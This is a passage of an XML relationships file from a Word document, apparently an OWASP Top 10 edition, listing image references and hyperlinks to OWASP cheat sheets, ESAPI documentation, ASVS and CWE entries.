Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId765" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId650" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Open_redirect" TargetMode="External"/><Relationship Id="rId651" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Open_redirect" TargetMode="External"/><Relationship Id="rId652" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Open_redirect" TargetMode="External"/><Relationship Id="rId653" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Open_redirect" TargetMode="External"/><Relationship Id="rId654" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Open_redirect" TargetMode="External"/><Relationship Id="rId655" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html" TargetMode="External"/><Relationship Id="rId656" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpeg"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/org/owasp/esapi/AccessReferenceMap.html" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId657" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html" TargetMode="External"/><Relationship Id="rId658" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html" TargetMode="External"/><Relationship Id="rId659" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.jpeg"/><Relationship Id="rId541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.jpeg"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.jpeg"/><Relationship Id="rId543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.jpeg"/><Relationship Id="rId544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.jpeg"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.jpeg"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/CSRFGuard" TargetMode="External"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/CSRFGuard" TargetMode="External"/><Relationship Id="rId548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/CSRFGuard" TargetMode="External"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fairwiki.riskmanagementinsight.com/" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fairwiki.riskmanagementinsight.com/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa302419.aspx" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa302419.aspx" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa302419.aspx" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa302419.aspx" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa302419.aspx" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa302419.aspx" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId433" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId435" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId660" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId661" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId662" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId663" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId664" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId665" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/URL-Redirector-Abuse" TargetMode="External"/><Relationship Id="rId666" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/URL-Redirector-Abuse" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId667" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/URL-Redirector-Abuse" TargetMode="External"/><Relationship Id="rId668" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/URL-Redirector-Abuse" TargetMode="External"/><Relationship Id="rId669" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/URL-Redirector-Abuse" TargetMode="External"/><Relationship Id="rId550" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId551" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId552" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId553" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/CSRFGuard" TargetMode="External"/><Relationship Id="rId555" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/CSRFGuard" TargetMode="External"/><Relationship Id="rId556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/CSRFGuard" TargetMode="External"/><Relationship Id="rId557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpeg"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpeg"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.html" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.html" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.html" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.html" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.html" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.html" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId441" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId670" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/URL-Redirector-Abuse" TargetMode="External"/><Relationship Id="rId671" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html" TargetMode="External"/><Relationship Id="rId672" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html" TargetMode="External"/><Relationship Id="rId673" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html" TargetMode="External"/><Relationship Id="rId674" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html" TargetMode="External"/><Relationship Id="rId675" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html" TargetMode="External"/><Relationship Id="rId676" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.jpeg"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.jpeg"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.jpeg"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.jpeg"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.jpeg"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.jpeg"/><Relationship Id="rId677" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html" TargetMode="External"/><Relationship Id="rId678" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html" TargetMode="External"/><Relationship Id="rId679" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html" TargetMode="External"/><Relationship Id="rId560" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId561" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html" TargetMode="External"/><Relationship Id="rId562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html" TargetMode="External"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html" TargetMode="External"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html" TargetMode="External"/><Relationship Id="rId565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html" TargetMode="External"/><Relationship Id="rId566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html" TargetMode="External"/><Relationship Id="rId567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)" TargetMode="External"/><Relationship Id="rId568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)" TargetMode="External"/><Relationship Id="rId569" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/384.html" 